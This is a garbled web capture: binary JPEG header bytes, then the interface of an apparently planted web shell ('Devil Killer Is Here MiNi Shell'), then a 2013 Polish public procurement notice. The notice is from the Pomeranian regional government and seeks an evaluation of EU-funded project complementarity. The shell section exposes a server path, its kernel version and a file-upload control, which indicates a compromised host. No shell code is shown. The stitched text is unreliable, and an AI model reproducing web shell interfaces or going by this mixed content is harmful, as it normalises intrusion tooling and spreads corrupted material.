JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131106/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131106/233861-N-2013.html

<p class="kh_header"><b>Gdańsk: Wykonanie badania ewaluacyjnego: /Ocena komplementarności projektów realizowanych w ramach Regionalnego Programu Operacyjnego dla Województwa Pomorskiego na lata 2007-2013 oraz projektów realizowanych w województwie pomorskim w ramach Polityki Spójności, Wspólnej Polityki Rolnej oraz Rybackiej/ oraz opracowanie Raportu z realizacji badania.</b><br>
<b>Numer ogłoszenia: 233861 - 2013; data zamieszczenia: 06.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samorząd Województwa Pomorskiego , ul. Okopowa 21/27, 80-810 Gdańsk, woj. pomorskie, tel. 058 3261555, faks 058 3261556.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pomorskie.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie badania ewaluacyjnego: /Ocena komplementarności projektów realizowanych w ramach Regionalnego Programu Operacyjnego dla Województwa Pomorskiego na lata 2007-2013 oraz projektów realizowanych w województwie pomorskim w ramach Polityki Spójności, Wspólnej Polityki Rolnej oraz Rybackiej/ oraz opracowanie Raportu z realizacji badania..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Zadaniem Wykonawcy jest wykonanie badania ewaluacyjnego pt. /Ocena komplementarności projektów realizowanych w ramach Regionalnego Programu Operacyjnego dla Województwa Pomorskiego na lata 2007-2013 oraz projektów realizowanych w województwie pomorskim w ramach Polityki Spójności, Wspólnej Polityki Rolnej oraz Rybackiej/ oraz opracowanie Raportu z realizacji badania.

2. Uzasadnienie: 
Z uwagi na potrzebę zintensyfikowania działań mających na celu przygotowanie się do nowej perspektywy finansowej UE 2014-2020, konieczna jest analiza efektywności wykorzystania środków unijnych w latach 2007-2013. Przeprowadzenie stosownych ewaluacji w tym zakresie jest warunkiem niezbędnym dla odpowiedniego zaprogramowania wsparcia w ramach regionalnego programu operacyjnego dla województwa pomorskiego na lata 2014-2020, który będzie programem dwufunduszowym (obejmującym wsparcie w ramach EFRR i EFS). 
Interwencja środków unijnych w regionie pochodzi w szczególności z Regionalnego Programu Operacyjnego dla Województwa Pomorskiego na lata 2007-2013 (RPO WP), dla którego Zarząd Województwa Pomorskiego (ZWP) pełni funkcję Instytucji Zarządzającej (IZ), a także z Programu Operacyjnego Infrastruktura i Środowisko (PO IŚ) i Programu Operacyjnego Innowacyjna Gospodarka (PO IG). Integralne uzupełnienie tej interwencji miało również miejsce w komponencie regionalnym Programu Operacyjnego Kapitał Ludzki (PO KL), dla którego ZWP pełni funkcję Instytucji Pośredniczącej oraz w wybranych działaniach Programu Rozwoju Obszarów Wiejskich na lata 2007-2013 (PROW) i Programu Operacyjnego Zrównoważony rozwój sektora rybołówstwa i nadbrzeżnych obszarów rybackich 2007-2013 w województwie pomorskim (PO Ryby).
W związku z faktem, iż w okresie programowania 2014-2020 wzmocnione zostanie zintegrowane podejście do wykorzystania środków UE na danym obszarze, a co za tym idzie potrzeba ścisłej koordynacji i komplementarności wsparcia uruchamianego z różnych źródeł, konieczna jest ocena komplementarności wsparcia udzielonego na realizację projektów na terenie województwa pomorskiego w latach 2007-2013, w tym mechanizmów instytucjonalnych i wdrożeniowych w celu wypracowania optymalnych mechanizmów zapewniających koordynację i komplementarność w wydatkowaniu środków unijnych 2014-2020 w województwie.

3.  Odbiorcy badania:
Głównym odbiorcą badania są: 
Zarząd Województwa Pomorskiego (ZWP);
Komitet Monitorujący RPO WP;
Komisja Europejska;
Ministerstwo Rozwoju Regionalnego;
Ministerstwo Rolnictwa i Rozwoju Wsi.

4. Założenia badania

4.1. Zakres badania

Zakres przedmiotowy:
1)	projekty wybrane do dofinansowania na dzień 30 czerwca 2013 r. w ramach Regionalnego Programu Operacyjnego dla Województwa Pomorskiego na lata 2007-2013 (bez Osi Priorytetowej 10 Pomoc techniczna);

2)	projekty wybrane do dofinansowania na dzień 30 czerwca 2013 r. w ramach Programu Operacyjnego Infrastruktura i Środowisko w obszarach:
a)	Transport:
Oś Priorytetowa VI Drogowa i lotnicza sieć TEN-T;
Oś Priorytetowa VII Transport przyjazny środowisku;
Oś Priorytetowa VIII Bezpieczeństwo transportu i krajowe sieci transportowe.
b)	Środowisko i energetyka:
Oś Priorytetowa I Gospodarka wodno-ściekowa;
Oś Priorytetowa II Gospodarka odpadami i ochrona powierzchni ziemi;
Oś Priorytetowa III Zarządzanie zasobami i przeciwdziałanie zagrożeniom środowiska; 
Oś Priorytetowa IV Przedsięwzięcia dostosowujące przedsiębiorstwa do wymogów ochrony środowiska; 
Oś Priorytetowa V Ochrona przyrody i kształtowanie postaw ekologicznych; 
Oś Priorytetowa IX Infrastruktura energetyczna przyjazna środowisku i efektywność energetyczna; 
Oś Priorytetowa X Bezpieczeństwo energetyczne, w tym dywersyfikacja źródeł energii.
c)	Turystyka i kultura:
Oś Priorytetowa XI Kultura i dziedzictwo kulturowe.
d)	Infrastruktura społeczna (w tym zdrowie):
Oś Priorytetowa XII Bezpieczeństwo zdrowotne i poprawa efektywności systemu; 
Oś Priorytetowa XIII Infrastruktura szkolnictwa wyższego.
3)	projekty wybrane do dofinansowania na dzień 30 czerwca 2013 r. w ramach Programu Operacyjnego Innowacyjna Gospodarka w obszarach:
a)	Innowacje, B+R, i społeczeństwo informacyjne:
Priorytet 1. Badania i rozwój nowoczesnych technologii;
Priorytet 2. Infrastruktura B+R;
Priorytet 3. Kapitał dla innowacji;
Priorytet 4. Inwestycje w innowacyjne przedsięwzięcia;
Priorytet 5. Dyfuzja innowacji
Priorytet 8. Społeczeństwo informacyjne - zwiększenie innowacyjności gospodarki.
b)	Turystyka i kultura:
Priorytet 6. Polska gospodarka na rynku międzynarodowym; Działanie 6.4 Inwestycje w produkty turystyczne o znaczeniu ponadregionalnym.

4)	projekty  wybrane do dofinansowania na dzień 30 czerwca 2013 r. w ramach komponentu regionalnego Programu Operacyjnego Kapitał Ludzki:
Priorytet VI Rynek pracy otwarty dla wszystkich;
Priorytet VII Promocja integracji społecznej;
Priorytet VIII Regionalne kadry gospodarki;
Priorytet IX Rozwój wykształcenia i kompetencji w regionach.

5)	projekty wybrane do dofinansowania na dzień 30 czerwca 2013 r. w ramach wybranych działań Programu Rozwoju Obszarów Wiejskich:
Oś Priorytetowa 1: Poprawa konkurencyjności sektora rolnego i leśnego, Działanie Poprawianie i rozwijanie infrastruktury związanej z rozwojem i dostosowaniem rolnictwa i leśnictwa (scalanie gruntów i gospodarowanie rolniczymi zasobami wodnymi); 
Oś Priorytetowa 3: Jakość życia na obszarach wiejskich i różnicowanie gospodarki wiejskiej, Działania Podstawowe usługi dla gospodarki i ludności wiejskiej oraz Odnowa i rozwój wsi;
Oś Priorytetowa 4: LEADER.

6)	projekty  wybrane do dofinansowania na dzień 30 czerwca 2013 r. w ramach Programu Operacyjnego Zrównoważony rozwój sektora rybołówstwa i nadbrzeżnych obszarów rybackich 2007-2013 w zakresie:
Oś Priorytetowa 4: Zrównoważony rozwój obszarów zależnych od rybactwa.

Zakres podmiotowy: beneficjenci RPO WP, beneficjenci wskazanych obszarów PO IŚ, PO IG oraz beneficjenci komponentu regionalnego PO KL i wskazanych działań PROW oraz PO Ryby.
Zakres czasowy: okres programowania 2007-2013 (stan realizacji RPO WP, stan realizacji wskazanych obszarów PO IŚ, PO IG oraz komponentu regionalnego PO KL i wybranych działań PROW, PO Ryby, stan na dzień 30 czerwca 2013 r.).
Zakres terytorialny: województwo pomorskie.

4.2. Cel główny:
Celem badania jest ocena mechanizmów koordynacji i komplementarności wsparcia we wskazanych obszarach tematycznych pochodzącego z Polityki Spójności, Wspólnej Polityki Rolnej i Wspólnej Polityki Rybackiej na terenie województwa pomorskiego oraz wypracowanie optymalnych mechanizmów zapewniających koordynację i komplementarność w wydatkowaniu środków publicznych, w szczególności unijnych w latach 2014-2020 w województwie pomorskim.
Komplementarność wsparcia jest jedną z zasad przyznawania wsparcia przez Unię Europejską państwom członkowskim UE, określoną w Rozporządzeniu Rady (WE) nr 1083/2006 z dnia 11 lipca 2006 r. ustanawiającym przepisy ogólne dotyczące Europejskiego Funduszu Rozwoju Regionalnego, Europejskiego Funduszu Społecznego oraz Funduszu Spójności i uchylającym Rozporządzenie (WE)1260/1999.
Za projekty komplementarne na potrzeby niniejszego zamówienia (bez względu na obszar tematyczny, którego dotyczą) należy uznawać przede wszystkim takie, które warunkują się nawzajem (realizacja jednego jest warunkiem koniecznym podjęcia realizacji drugiego) lub stanowią następujące po sobie etapy określonego programu lub działania. Jako komplementarne można również rozpatrywać projekty, które wzajemnie wzmacniają swoje rezultaty. 
Efektem badania powinny być rekomendacje związane z wypracowaniem optymalnych mechanizmów zapewniających koordynację i komplementarność w wydatkowaniu środków publicznych, w szczególności unijnych w województwie w ramach RPO WP 2014-2020 oraz w krajowych programach operacyjnych.
5. 	Szczegółowy opis przedmiotu zamówienia znajduje się w Załączniku nr 1 do SIWZ.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 73.11.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 133.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający w niniejszym postępowaniu nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocena spełnienia wyżej wskazanego warunku nastąpi na podstawie przedstawionego przez Wykonawcę oświadczenia o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust.1 ustawy Prawo zamówień publicznych, o którym mowa w rozdz. VI ust.1 pkt 1 SIWZ (wzór oświadczenia stanowi załącznik nr 3 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ww. warunek za spełniony, jeżeli Wykonawcy wykażą, że przeprowadzili w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, należycie co najmniej 2 usługi polegające na ewaluacji, badaniach lub analizach o wartości min. 100 000 PLN brutto każda (w tym co najmniej jedną ewaluację interwencji Publicznych) przy czym, przez interwencję publiczną rozumie się działanie organów publicznych mające na celu rozwiązanie określonych problemów społeczno-gospodarczych, przeciwdziałanie im, lub też realizację określonych celów wynikających z międzynarodowej, krajowej, regionalnej lub lokalnej polityki;

Ocena spełnienia wyżej wskazanego warunku nastąpi na podstawie przedstawionego przez Wykonawcę  oświadczenia o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust.1 ustawy Prawo zamówień publicznych, o którym mowa w rozdz. VI ust.1 pkt 1 SIWZ (wzór oświadczenia stanowi załącznik nr 3 do SIWZ) oraz dokumentów, o których mowa w rozdz. VI ust. 1 pkt. 2 SIWZ (wzór wykazu usług stanowi załącznik nr 5 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocena spełnienia wyżej wskazanego warunku nastąpi na podstawie przedstawionego przez Wykonawcę oświadczenia o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust.1 ustawy Prawo zamówień publicznych, o którym mowa w rozdz. VI ust.1 pkt 1 SIWZ (wzór oświadczenia stanowi załącznik nr 3 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna w/w warunek za spełniony, jeżeli Wykonawcy wykażą, że dysponują Zespołem badawczym, składającym się z koordynatora zespołu oraz co najmniej 4 osób zdolnych do wykonania zamówienia, z których każda (również koordynator) legitymuje się dyplomem co najmniej magistra oraz posiada co najmniej 3-letnie udokumentowane doświadczenie w pracy naukowej lub zawodowej, której przedmiotem było przeprowadzanie badań ewaluacyjnych lub analiz dotyczących rozwoju społeczno-gospodarczego regionu i/lub kraju, w tym:
a)	pierwsza osoba jest autorem lub współautorem:
- 	narzędzi badawczych w co najmniej 1 badaniu/analizie z  zakresu interwencji publicznej, w którym/ej zastosowano metody ilościowe (próba minimum 300 ankiet) oraz jakościowe (próba minimum 10 indywidualnych wywiadów pogłębionych) o wartości przynajmniej 50 000 PLN brutto;
lub
- 	narzędzi badawczych w co najmniej 1 badaniu/analizie z  zakresu interwencji publicznej, w którym/ej zastosowano metody ilościowe (próba minimum 300 ankiet) o wartości przynajmniej 25 000 PLN brutto oraz 1 badaniu/analizie z zakresu interwencji publicznej, w którym/ej zastosowano metody jakościowe (próba minimum 10 indywidualnych wywiadów pogłębionych) o wartości przynajmniej 25 000 PLN brutto;
b) 	druga osoba jest autorem lub współautorem co najmniej 1 badania/analizy z zakresu interwencji publicznej w obszarze wsparcia przedsiębiorstw o wartości przynajmniej 50 000 PLN brutto;
c)	trzecia osoba jest autorem lub współautorem co najmniej 1 badania/analizy z zakresu interwencji publicznej w obszarze instytucji otoczenia biznesu wspierających przedsiębiorczość o wartości przynajmniej 50 000 PLN brutto;
d)	czwarta osoba jest autorem lub współautorem co najmniej 1 badania/analizy z zakresu interwencji publicznej w obszarze sektora B+R i/lub uczelni o wartości przynajmniej 50 000 PLN brutto;
e)	do kierowania Zespołem badawczym Wykonawca wyznaczy koordynatora - osobę, która posiada odpowiednie doświadczenie, to znaczy pełniła funkcję koordynatora badania w co najmniej 2 badaniach ewaluacyjnych/analizach z  zakresu interwencji publicznej o wartości przynajmniej 50 000 zł brutto każde.

Ocena spełnienia wyżej wskazanego warunku nastąpi na podstawie przedstawionego przez Wykonawcę  oświadczenia o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust.1 ustawy Prawo zamówień publicznych, o którym mowa w rozdz. VI ust.1 pkt 1 SIWZ (wzór oświadczenia stanowi załącznik nr 3 do SIWZ) oraz dokumentów, o których mowa w rozdz. VI ust. 1 pkt. 3 SIWZ (wzór wykazu osób stanowi załącznik nr 4 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocena spełnienia wyżej wskazanego warunku nastąpi na podstawie przedstawionego przez Wykonawcę oświadczenia o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust.1 ustawy Prawo zamówień publicznych, o którym mowa w rozdz. VI ust.1 pkt 1 SIWZ (wzór oświadczenia stanowi załącznik nr 3 do SIWZ).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w rozdziale III.4.3.1) niniejszego ogłoszenia - składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego likwidacji ani nie ogłoszono upadłości.
2. Dokumenty, o których mowa w ust. 1 powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
3. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w rozdziale III.4.3.1) niniejszego ogłoszenia zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem. Do aktualności tego dokumentu mają odpowiednie zastosowanie zapisy ust. 2. 
4. Wymagania dotyczące zabezpieczenia należytego wykonania umowy. 

Zamawiający nie żąda w niniejszym postępowaniu wniesienia zabezpieczenia należytego wykonania umowy.

UWAGA:
Zamawiający wymaga, aby Wykonawca złożył Metodologię badania i sposób realizacji zamówienia, zawierającą elementy niezbędny do dokonania oceny oferty zgodnie z kryterium oceny ofert Metodologia i sposób realizacji zamówienia określonym w rozdziale XIII ust. 2 pkt 2 i ust 3 SIWZ, w wersji papierowej oraz elektronicznej na nośniku CD/DVD w formacie PDF (czytelny skan Metodologii badania i sposobu realizacji zamówienia w wersji elektronicznej).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 40</li>
<li>2 - Metodologia i sposób realizacji zamówienia - 60</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Istotne zmiany umowy w stosunku do treści oferty Wykonawcy mogą dotyczyć:
1)	terminu realizacji zamówienia,
2)	warunków i terminów płatności,
3)	organizacji  prac,
4)	harmonogramu prac,
5)	zmiany składu Zespołu badawczego.
2. Zmiany, o których mowa w ust.1 mogą nastąpić jedynie w uzasadnionych przypadkach tj.: 
1)	w zakresie pkt 1) 2) 3) 4) i 5) w przypadku: wystąpienia /siły wyższej/, w szczególności takiej jak katastrofa naturalna, strajk, pożar, eksplozja, wojna, atak terrorystyczny,
2)	w zakresie pkt 2) w przypadku: zmian powszechnie obowiązujących przepisów prawa 
w trakcie realizacji umowy, w szczególności dotyczących przepisów podatkowych, np. zmiany ustawowej stawki podatku VAT lub regulacji dot. wykorzystania środków budżetowych,
3)	w zakresie pkt 1) 2) 3) i 4) w przypadku przedłużenia się terminu zakończenia postępowania o udzielenie zamówienia,
4)	w zakresie pkt 5) w przypadku wystąpienia innych niż w pkt 1) niezawinionych przez Wykonawcę okoliczności uniemożliwiających realizację zamówienia zgodnie z /Wykazem osób/, stanowiącym załącznik do Oferty Wykonawcy stanowiącej Załącznik nr 2 do umowy i jedynie za zgodą Zamawiającego. Zgoda może zostać udzielona pod warunkiem zapewnienia przez Wykonawcę nowego/-ych członka/-ów zespołu który/-rzy posiadać będą doświadczenie i kwalifikacje zawodowe odpowiadające wymaganiom określonym w rozdz. V ust 1 pkt 3 SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.pomorskie.eu/pl/bip/umwp/zamowienia/zamowienia<br>
